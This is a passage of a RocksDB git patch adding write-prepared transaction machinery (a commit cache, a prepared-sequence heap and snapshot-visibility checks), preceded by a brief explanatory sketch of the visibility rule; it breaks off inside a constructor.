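At a high level, the visibility rule that IsInSnapshot implements reduces to "a version is visible iff its commit sequence is known and is <= the snapshot sequence"; everything else in the patch below is machinery for recovering the commit sequence cheaply from the commit cache, the delayed-prepared set, and the old-commit map. A condensed sketch of that rule, with the bookkeeping abstracted behind a hypothetical lookup callback (the callback is not part of the patch):

```
#include <cstdint>
#include <functional>

// Stand-in for the commit-cache / delayed_prepared_ / old_commit_map_
// lookups done by the real code; returns false while the transaction is
// still prepared, i.e. not committed yet.
using CommitLookup = std::function<bool(uint64_t, uint64_t*)>;

inline bool IsVisible(uint64_t prep_seq, uint64_t snapshot_seq,
                      const CommitLookup& get_commit_seq) {
  if (snapshot_seq < prep_seq) {
    // snapshot_seq < prep_seq <= commit_seq, so the write committed after
    // the snapshot was taken.
    return false;
  }
  uint64_t commit_seq;
  if (!get_commit_seq(prep_seq, &commit_seq)) {
    return false;  // still prepared, hence invisible to every snapshot
  }
  return commit_seq <= snapshot_seq;
}
```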
Closes https://github.com/facebook/rocksdb/pull/2713 Differential Revision: D5640021 Pulled By: maysamyabandeh fbshipit-source-id: bfa7a05e8d8498811fab714ce4b9c21530514e1c --- db/db_impl.h | 8 +- db/db_impl_write.cc | 33 ++- db/snapshot_impl.h | 4 +- db/write_batch.cc | 1 + utilities/blob_db/blob_db_impl.cc | 2 +- .../transactions/optimistic_transaction.cc | 11 +- .../transactions/optimistic_transaction.h | 4 +- .../transactions/pessimistic_transaction.cc | 35 ++-- .../transactions/pessimistic_transaction.h | 4 +- .../pessimistic_transaction_db.cc | 198 +++++++++++++++++- .../transactions/pessimistic_transaction_db.h | 105 +++++++++- .../transactions/transaction_lock_mgr.cc | 12 +- utilities/transactions/write_prepared_txn.cc | 47 ++++- utilities/transactions/write_prepared_txn.h | 12 +- 14 files changed, 404 insertions(+), 72 deletions(-) diff --git a/db/db_impl.h b/db/db_impl.h index 31d69a97041..39c1d6103f9 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -616,16 +616,18 @@ class DBImpl : public DB { Status WriteImpl(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, uint64_t* log_used = nullptr, uint64_t log_ref = 0, - bool disable_memtable = false); + bool disable_memtable = false, uint64_t* seq_used = nullptr); Status PipelinedWriteImpl(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, uint64_t* log_used = nullptr, uint64_t log_ref = 0, - bool disable_memtable = false); + bool disable_memtable = false, + uint64_t* seq_used = nullptr); Status WriteImplWALOnly(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, - uint64_t* log_used = nullptr, uint64_t log_ref = 0); + uint64_t* log_used = nullptr, uint64_t log_ref = 0, + uint64_t* seq_used = nullptr); uint64_t FindMinLogContainingOutstandingPrep(); uint64_t FindMinPrepLogReferencedByMemTable(); diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index b93dd6f8faa..512819772ea 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -60,7 +60,7 @@ Status DBImpl::WriteWithCallback(const WriteOptions& write_options, Status DBImpl::WriteImpl(const WriteOptions& write_options, WriteBatch* my_batch, WriteCallback* callback, uint64_t* log_used, uint64_t log_ref, - bool disable_memtable) { + bool disable_memtable, uint64_t* seq_used) { if (my_batch == nullptr) { return Status::Corruption("Batch is nullptr!"); } @@ -79,12 +79,12 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, if (concurrent_prepare_ && disable_memtable) { return WriteImplWALOnly(write_options, my_batch, callback, log_used, - log_ref); + log_ref, seq_used); } if (immutable_db_options_.enable_pipelined_write) { return PipelinedWriteImpl(write_options, my_batch, callback, log_used, - log_ref, disable_memtable); + log_ref, disable_memtable, seq_used); } PERF_TIMER_GUARD(write_pre_and_post_process_time); @@ -127,6 +127,9 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, if (log_used != nullptr) { *log_used = w.log_used; } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } // write is complete and leader has updated sequence return w.FinalStatus(); } @@ -278,6 +281,9 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, write_options.ignore_missing_column_families, 0 /*log_number*/, this, true /*concurrent_memtable_writes*/); } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } } } } @@ -325,7 +331,7 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, Status DBImpl::PipelinedWriteImpl(const WriteOptions& 
write_options, WriteBatch* my_batch, WriteCallback* callback, uint64_t* log_used, uint64_t log_ref, - bool disable_memtable) { + bool disable_memtable, uint64_t* seq_used) { PERF_TIMER_GUARD(write_pre_and_post_process_time); StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE); @@ -440,6 +446,9 @@ Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options, write_thread_.ExitAsMemTableWriter(&w, *w.write_group); } } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } assert(w.state == WriteThread::STATE_COMPLETED); return w.FinalStatus(); @@ -447,7 +456,8 @@ Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options, Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, WriteBatch* my_batch, WriteCallback* callback, - uint64_t* log_used, uint64_t log_ref) { + uint64_t* log_used, uint64_t log_ref, + uint64_t* seq_used) { Status status; PERF_TIMER_GUARD(write_pre_and_post_process_time); WriteThread::Writer w(write_options, my_batch, callback, log_ref, @@ -464,6 +474,9 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (log_used != nullptr) { *log_used = w.log_used; } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } return w.FinalStatus(); } // else we are the leader of the write batch group @@ -509,6 +522,13 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, // wal_write_mutex_ to ensure ordered events in WAL status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence, 0 /*total_count*/); + auto curr_seq = last_sequence + 1; + for (auto* writer : write_group) { + if (writer->CheckCallback(this)) { + writer->sequence = curr_seq; + curr_seq += WriteBatchInternal::Count(writer->batch); + } + } if (status.ok() && write_options.sync) { // Requesting sync with concurrent_prepare_ is expected to be very rare. We // hence provide a simple implementation that is not necessarily efficient. @@ -527,6 +547,9 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (status.ok()) { status = w.FinalStatus(); } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } return status; } diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index b94602f2ae5..8441050fd2c 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -76,7 +76,7 @@ class SnapshotList { // retrieve all snapshot numbers. They are sorted in ascending order.
std::vector<SequenceNumber> GetAll( - SequenceNumber* oldest_write_conflict_snapshot = nullptr) { + SequenceNumber* oldest_write_conflict_snapshot = nullptr) const { std::vector<SequenceNumber> ret; if (oldest_write_conflict_snapshot != nullptr) { @@ -86,7 +86,7 @@ class SnapshotList { if (empty()) { return ret; } - SnapshotImpl* s = &list_; + const SnapshotImpl* s = &list_; while (s->next_ != &list_) { ret.push_back(s->next_->number_); diff --git a/db/write_batch.cc b/db/write_batch.cc index 91be9a0dfa6..43639ac2320 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -1303,6 +1303,7 @@ Status WriteBatchInternal::InsertInto(WriteThread::WriteGroup& write_group, continue; } SetSequence(w->batch, inserter.sequence()); + w->sequence = inserter.sequence(); inserter.set_log_number_ref(w->log_ref); w->status = w->batch->Iterate(&inserter); if (!w->status.ok()) { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index a15fe4a18ab..06350b896e3 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,8 +32,8 @@ #include "util/random.h" #include "util/sync_point.h" #include "util/timer_queue.h" -#include "utilities/transactions/optimistic_transaction_db_impl.h" #include "utilities/transactions/optimistic_transaction.h" +#include "utilities/transactions/optimistic_transaction_db_impl.h" namespace { int kBlockBasedTableVersionFormat = 2; diff --git a/utilities/transactions/optimistic_transaction.cc b/utilities/transactions/optimistic_transaction.cc index 882fbec4a51..89d3226d5df 100644 --- a/utilities/transactions/optimistic_transaction.cc +++ b/utilities/transactions/optimistic_transaction.cc @@ -44,12 +44,9 @@ void OptimisticTransaction::Reinitialize( Initialize(txn_options); } -OptimisticTransaction::~OptimisticTransaction() { -} +OptimisticTransaction::~OptimisticTransaction() {} -void OptimisticTransaction::Clear() { - TransactionBaseImpl::Clear(); -} +void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } Status OptimisticTransaction::Prepare() { return Status::InvalidArgument( @@ -82,8 +79,8 @@ Status OptimisticTransaction::Rollback() { // // 'exclusive' is unused for OptimisticTransaction.
Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, - bool exclusive, bool untracked) { + const Slice& key, bool read_only, + bool exclusive, bool untracked) { if (untracked) { return Status::OK(); } diff --git a/utilities/transactions/optimistic_transaction.h b/utilities/transactions/optimistic_transaction.h index b49bd6ab900..5a19489f235 100644 --- a/utilities/transactions/optimistic_transaction.h +++ b/utilities/transactions/optimistic_transaction.h @@ -29,8 +29,8 @@ namespace rocksdb { class OptimisticTransaction : public TransactionBaseImpl { public: OptimisticTransaction(OptimisticTransactionDB* db, - const WriteOptions& write_options, - const OptimisticTransactionOptions& txn_options); + const WriteOptions& write_options, + const OptimisticTransactionOptions& txn_options); virtual ~OptimisticTransaction(); diff --git a/utilities/transactions/pessimistic_transaction.cc b/utilities/transactions/pessimistic_transaction.cc index 092b7132c25..68b8b4f1a76 100644 --- a/utilities/transactions/pessimistic_transaction.cc +++ b/utilities/transactions/pessimistic_transaction.cc @@ -35,9 +35,9 @@ TransactionID PessimisticTransaction::GenTxnID() { return txn_id_counter_.fetch_add(1); } -PessimisticTransaction::PessimisticTransaction(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) +PessimisticTransaction::PessimisticTransaction( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), txn_db_impl_(nullptr), expiration_time_(0), @@ -99,9 +99,9 @@ void PessimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } -void PessimisticTransaction::Reinitialize(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) { +void PessimisticTransaction::Reinitialize( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { txn_db_impl_->UnregisterTransaction(this); } @@ -120,9 +120,9 @@ bool PessimisticTransaction::IsExpired() const { return false; } -WriteCommittedTxn::WriteCommittedTxn( - TransactionDB* txn_db, const WriteOptions& write_options, - const TransactionOptions& txn_options) +WriteCommittedTxn::WriteCommittedTxn(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) : PessimisticTransaction(txn_db, write_options, txn_options){}; Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) { @@ -370,7 +370,7 @@ Status PessimisticTransaction::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock Status PessimisticTransaction::LockBatch(WriteBatch* batch, - TransactionKeyMap* keys_to_unlock) { + TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: // Sorted map of column_family_id to sorted set of keys. @@ -448,8 +448,8 @@ Status PessimisticTransaction::LockBatch(WriteBatch* batch, // this key will only be locked if there have been no writes to this key since // the snapshot time. 
Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, bool exclusive, - bool untracked) { + const Slice& key, bool read_only, + bool exclusive, bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); std::string key_str = key.ToString(); bool previously_locked; @@ -535,10 +535,9 @@ Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. -Status PessimisticTransaction::ValidateSnapshot(ColumnFamilyHandle* column_family, - const Slice& key, - SequenceNumber prev_seqno, - SequenceNumber* new_seqno) { +Status PessimisticTransaction::ValidateSnapshot( + ColumnFamilyHandle* column_family, const Slice& key, + SequenceNumber prev_seqno, SequenceNumber* new_seqno) { assert(snapshot_); SequenceNumber seq = snapshot_->GetSequenceNumber(); @@ -566,8 +565,8 @@ bool PessimisticTransaction::TryStealingLocks() { LOCKS_STOLEN); } -void PessimisticTransaction::UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) { +void PessimisticTransaction::UnlockGetForUpdate( + ColumnFamilyHandle* column_family, const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } diff --git a/utilities/transactions/pessimistic_transaction.h b/utilities/transactions/pessimistic_transaction.h index a0162fa279c..5c6d4d2618f 100644 --- a/utilities/transactions/pessimistic_transaction.h +++ b/utilities/transactions/pessimistic_transaction.h @@ -38,7 +38,7 @@ class PessimisticTransactionDB; class PessimisticTransaction : public TransactionBaseImpl { public: PessimisticTransaction(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + const TransactionOptions& txn_options); virtual ~PessimisticTransaction(); @@ -182,7 +182,7 @@ class PessimisticTransaction : public TransactionBaseImpl { class WriteCommittedTxn : public PessimisticTransaction { public: WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + const TransactionOptions& txn_options); virtual ~WriteCommittedTxn() {} diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 9787d76df65..156e7a12b0d 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -16,8 +16,9 @@ #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" #include "util/cast_util.h" -#include "utilities/transactions/transaction_db_mutex_impl.h" +#include "util/mutexlock.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/transaction_db_mutex_impl.h" namespace rocksdb { @@ -301,7 +302,8 @@ Status PessimisticTransactionDB::DropColumnFamily( return s; } -Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, uint32_t cfh_id, +Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, + uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); @@ -312,8 +314,8 @@ void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, lock_mgr_.UnLock(txn, keys, GetEnv()); } -void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, uint32_t cfh_id, - const std::string& key) { +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, + uint32_t cfh_id, const 
std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -409,7 +411,8 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check<PessimisticTransaction, Transaction>(txn); + auto txn_impl = + static_cast_with_check<PessimisticTransaction, Transaction>(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. @@ -422,8 +425,8 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, return s; } -void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTransaction* tx) { +void PessimisticTransactionDB::InsertExpirableTransaction( + TransactionID tx_id, PessimisticTransaction* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard<std::mutex> lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -449,7 +452,8 @@ bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check<PessimisticTransaction, Transaction>(txn); + auto txn_impl = + static_cast_with_check<PessimisticTransaction, Transaction>(txn); txn_impl->Reinitialize(this, write_options, txn_options); } @@ -499,5 +503,183 @@ void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) { transactions_.erase(it); } +// Returns true if commit_seq <= snapshot_seq +bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq, + uint64_t snapshot_seq) { + // Here we try to infer the return value without looking into the prepare + // list. This would help avoid synchronization over a shared map. + // TODO(myabandeh): read your own writes + // TODO(myabandeh): optimize this. This sequence of checks must be correct but + // not necessarily efficient + if (snapshot_seq < prep_seq) { + // snapshot_seq < prep_seq <= commit_seq => snapshot_seq < commit_seq + return false; + } + if (!delayed_prepared_empty_.load(std::memory_order_acquire)) { + // We should not normally reach here + ReadLock rl(&prepared_mutex_); + if (delayed_prepared_.find(prep_seq) != delayed_prepared_.end()) { + // Then it is not committed yet + return false; + } + } + auto indexed_seq = prep_seq % COMMIT_CACHE_SIZE; + CommitEntry cached; + bool exist = GetCommitEntry(indexed_seq, &cached); + if (!exist) { + // It is not committed, so it must be still prepared + return false; + } + if (prep_seq == cached.prep_seq) { + // It is committed and also not evicted from commit cache + return cached.commit_seq <= snapshot_seq; + } + // At this point we don't know if it was committed or it is still prepared + auto max_evicted_seq = max_evicted_seq_.load(std::memory_order_acquire); + if (max_evicted_seq < prep_seq) { + // Not evicted from cache and also not present, so must be still prepared + return false; + } + // When advancing max_evicted_seq_, we move older entries from prepared to + // delayed_prepared_. Also we move evicted entries from commit cache to + // old_commit_map_ if they overlap with any snapshot.
Since prep_seq <= + // max_evicted_seq_, we have three cases: i) in delayed_prepared_, ii) in + // old_commit_map_, iii) committed with no conflict with any snapshot. (i) + // delayed_prepared_ is checked above + if (max_evicted_seq < snapshot_seq) { // then (ii) cannot be the case + // only (iii) is the case: committed + // commit_seq <= max_evicted_seq_ < snapshot_seq => commit_seq < + // snapshot_seq + return true; + } + // else (ii) might be the case: check the commit data saved for this snapshot. + // If there was no overlapping commit entry, then it is committed with a + // commit_seq lower than any live snapshot, including snapshot_seq. + if (old_commit_map_empty_.load(std::memory_order_acquire)) { + return true; + } + { + // We should not normally reach here + ReadLock rl(&old_commit_map_mutex_); + auto old_commit_entry = old_commit_map_.find(prep_seq); + if (old_commit_entry == old_commit_map_.end() || + old_commit_entry->second <= snapshot_seq) { + return true; + } + } + // (ii) is the case: it is committed but after the snapshot_seq + return false; +} + +void WritePreparedTxnDB::AddPrepared(uint64_t seq) { prepared_txns_.push(seq); } + +void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, + uint64_t commit_seq) { + auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE; + CommitEntry evicted; + bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted); + if (to_be_evicted) { + auto prev_max = max_evicted_seq_.load(std::memory_order_acquire); + if (prev_max < evicted.commit_seq) { + auto max_evicted_seq = evicted.commit_seq; + // When max_evicted_seq_ advances, move older entries from prepared_txns_ + // to delayed_prepared_. This guarantees that if a seq is lower than max, + // then it is not in prepared_txns_ and saves an expensive, synchronized + // lookup from a shared set. delayed_prepared_ is expected to be empty in + // normal cases. + { + WriteLock wl(&prepared_mutex_); + while (!prepared_txns_.empty() && + prepared_txns_.top() <= max_evicted_seq) { + auto to_be_popped = prepared_txns_.top(); + delayed_prepared_.insert(to_be_popped); + prepared_txns_.pop(); + delayed_prepared_empty_.store(false, std::memory_order_release); + } + } + { + WriteLock wl(&snapshots_mutex_); + InstrumentedMutex(db_impl_->mutex()); + snapshots_ = db_impl_->snapshots().GetAll(); + } + while (prev_max < max_evicted_seq && + !max_evicted_seq_.compare_exchange_weak( + prev_max, max_evicted_seq, std::memory_order_release, + std::memory_order_acquire)) { + }; + } + // After each eviction from commit cache, check if the commit entry should + // be kept around because it overlaps with a live snapshot. + { + ReadLock rl(&snapshots_mutex_); + for (auto snapshot : snapshots_) { + auto snapshot_seq = + reinterpret_cast<const SnapshotImpl*>(snapshot)->number_; + if (evicted.commit_seq <= snapshot_seq) { + break; + } + // then snapshot_seq < evicted.commit_seq + if (evicted.prep_seq <= snapshot_seq) { // overlapping range + WriteLock wl(&old_commit_map_mutex_); + old_commit_map_empty_.store(false, std::memory_order_release); + old_commit_map_[evicted.prep_seq] = evicted.commit_seq; + } + } + } + } + bool succ = + ExchangeCommitEntry(indexed_seq, evicted, {prepare_seq, commit_seq}); + if (!succ) { + // A very rare event, in which the commit entry is updated before we do. + // Here we apply a very simple solution of retrying.
+ // TODO(myabandeh): take precautions to detect bugs that cause infinite loops + AddCommitted(prepare_seq, commit_seq); + return; + } + { + WriteLock wl(&prepared_mutex_); + prepared_txns_.erase(prepare_seq); + bool was_empty = delayed_prepared_.empty(); + if (!was_empty) { + delayed_prepared_.erase(prepare_seq); + bool is_empty = delayed_prepared_.empty(); + if (was_empty != is_empty) { + delayed_prepared_empty_.store(is_empty, std::memory_order_release); + } + } + } +} + +bool WritePreparedTxnDB::GetCommitEntry(uint64_t indexed_seq, + CommitEntry* entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + ReadLock rl(&commit_cache_mutex_); + *entry = commit_cache_[indexed_seq]; + return (entry->commit_seq != 0); // initialized +} + +bool WritePreparedTxnDB::AddCommitEntry(uint64_t indexed_seq, + CommitEntry& new_entry, + CommitEntry* evicted_entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + WriteLock wl(&commit_cache_mutex_); + *evicted_entry = commit_cache_[indexed_seq]; + commit_cache_[indexed_seq] = new_entry; + return (evicted_entry->commit_seq != 0); // initialized +} + +bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq, + CommitEntry& expected_entry, + CommitEntry new_entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + WriteLock wl(&commit_cache_mutex_); + auto& evicted_entry = commit_cache_[indexed_seq]; + if (evicted_entry.prep_seq != expected_entry.prep_seq) { + return false; + } + commit_cache_[indexed_seq] = new_entry; + return true; +} + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 6ff1d015a80..35c2a014330 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -8,6 +8,7 @@ #include #include +#include <queue> #include #include #include @@ -64,11 +65,12 @@ class PessimisticTransactionDB : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, - bool exclusive); + Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, + const std::string& key, bool exclusive); void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys); - void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, + const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -79,7 +81,8 @@ class PessimisticTransactionDB : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, PessimisticTransaction* tx); + void InsertExpirableTransaction(TransactionID tx_id, + PessimisticTransaction* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -97,14 +100,18 @@ class PessimisticTransactionDB : public TransactionDB { void GetAllPreparedTransactions(std::vector<Transaction*>* trans) override; TransactionLockMgr::LockStatusData GetLockStatusData() override; + struct CommitEntry { + uint64_t prep_seq; + uint64_t commit_seq; + }; protected: void ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options = TransactionOptions()); + DBImpl* db_impl_; private: - DBImpl* db_impl_; const TransactionDBOptions txn_db_options_; TransactionLockMgr
lock_mgr_; @@ -161,6 +168,94 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { Transaction* BeginTransaction(const WriteOptions& write_options, const TransactionOptions& txn_options, Transaction* old_txn) override; + + // Check whether the transaction that wrote the value with sequence number seq + // is visible to the snapshot with sequence number snapshot_seq + bool IsInSnapshot(uint64_t seq, uint64_t snapshot_seq); + // Add the transaction with prepare sequence seq to the prepared list + void AddPrepared(uint64_t seq); + // Add the transaction with prepare sequence prepare_seq and commit sequence + // commit_seq to the commit map + void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq); + + private: + // A heap with the amortized O(1) complexity for erase. It uses one extra heap + // to keep track of erased entries that are not yet on top of the main heap. + class PreparedHeap { + std::priority_queue<uint64_t> heap_; + std::priority_queue<uint64_t> erased_heap_; + + public: + bool empty() { return heap_.empty(); } + uint64_t top() { return heap_.top(); } + void push(uint64_t v) { heap_.push(v); } + void pop() { + heap_.pop(); + while (!heap_.empty() && !erased_heap_.empty() && + heap_.top() == erased_heap_.top()) { + heap_.pop(); + erased_heap_.pop(); + } + } + void erase(uint64_t seq) { + if (!heap_.empty()) { + if (heap_.top() < seq) { + // Already popped, ignore it. + } else if (heap_.top() == seq) { + heap_.pop(); + } else { // (heap_.top() > seq) + // Down the heap, remember to pop it later + erased_heap_.push(seq); + } + } + } + }; + + // Get the commit entry with index indexed_seq from the commit table. It + // returns true if such entry exists. + bool GetCommitEntry(uint64_t indexed_seq, CommitEntry* entry); + // Rewrite the entry with the index indexed_seq in the commit table with the + // commit entry <prepare_seq, commit_seq>. If the rewrite results in eviction, + // sets the evicted_entry and returns true. + bool AddCommitEntry(uint64_t indexed_seq, CommitEntry& new_entry, + CommitEntry* evicted_entry); + // Rewrite the entry with the index indexed_seq in the commit table with the + // commit entry new_entry only if the existing entry matches the + // expected_entry. Returns false otherwise. + bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry, + CommitEntry new_entry); + + // The list of live snapshots at the last time that max_evicted_seq_ advanced. + // The list is sorted in ascending order. Thread-safety is provided with + // snapshots_mutex_. + std::vector<SequenceNumber> snapshots_; + // A heap of prepared transactions. Thread-safety is provided with + // prepared_mutex_. + PreparedHeap prepared_txns_; + // 2^21 entries, 32MB in total + static const uint64_t COMMIT_CACHE_SIZE = static_cast<uint64_t>(1 << 21); + // commit_cache_ is initialized to zero to tell apart an empty index from a + // filled one. Thread-safety is provided with commit_cache_mutex_. + CommitEntry commit_cache_[COMMIT_CACHE_SIZE] = {}; + // The largest evicted *commit* sequence number from the commit_cache_ + std::atomic<uint64_t> max_evicted_seq_ = {}; + // A map of the evicted entries from commit_cache_ that has to be kept around + // to service the old snapshots. This is expected to be empty normally. + // Thread-safety is provided with old_commit_map_mutex_. + std::map<uint64_t, uint64_t> old_commit_map_; + // A set of long-running prepared transactions that are not finished by the + // time max_evicted_seq_ advances their sequence number. This is expected to + // be empty normally. Thread-safety is provided with prepared_mutex_.
+ std::set<uint64_t> delayed_prepared_; + // Update when delayed_prepared_.empty() changes. Expected to be true + // normally. + std::atomic<bool> delayed_prepared_empty_ = {true}; + // Update when old_commit_map_.empty() changes. Expected to be true normally. + std::atomic<bool> old_commit_map_empty_ = {true}; + port::RWMutex prepared_mutex_; + port::RWMutex old_commit_map_mutex_; + port::RWMutex commit_cache_mutex_; + port::RWMutex snapshots_mutex_; }; } // namespace rocksdb diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index d93d5bcde77..9b7a4e640d9 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -357,13 +357,15 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const PessimisticTransaction* txn, const autovector<TransactionID>& wait_ids) { + const PessimisticTransaction* txn, + const autovector<TransactionID>& wait_ids) { std::lock_guard<std::mutex> lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } void TransactionLockMgr::DecrementWaitersImpl( - const PessimisticTransaction* txn, const autovector<TransactionID>& wait_ids) { + const PessimisticTransaction* txn, + const autovector<TransactionID>& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +379,8 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const PessimisticTransaction* txn, const autovector<TransactionID>& wait_ids) { + const PessimisticTransaction* txn, + const autovector<TransactionID>& wait_ids) { auto id = txn->GetID(); std::vector<TransactionID> queue(txn->GetDeadlockDetectDepth()); std::lock_guard<std::mutex> lock(wait_txn_map_mutex_); @@ -537,7 +540,8 @@ void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn, } } -void TransactionLockMgr::UnLock(PessimisticTransaction* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTransaction* txn, + uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); diff --git a/utilities/transactions/write_prepared_txn.cc b/utilities/transactions/write_prepared_txn.cc index f3942855bf2..211e2172407 100644 --- a/utilities/transactions/write_prepared_txn.cc +++ b/utilities/transactions/write_prepared_txn.cc @@ -14,17 +14,18 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" -#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/pessimistic_transaction_db.h" namespace rocksdb { struct WriteOptions; -WritePreparedTxn::WritePreparedTxn( - TransactionDB* txn_db, const WriteOptions& write_options, - const TransactionOptions& txn_options) - : PessimisticTransaction(txn_db, write_options, txn_options) { +WritePreparedTxn::WritePreparedTxn(WritePreparedTxnDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTransaction(txn_db, write_options, txn_options), + wpt_db_(txn_db) { 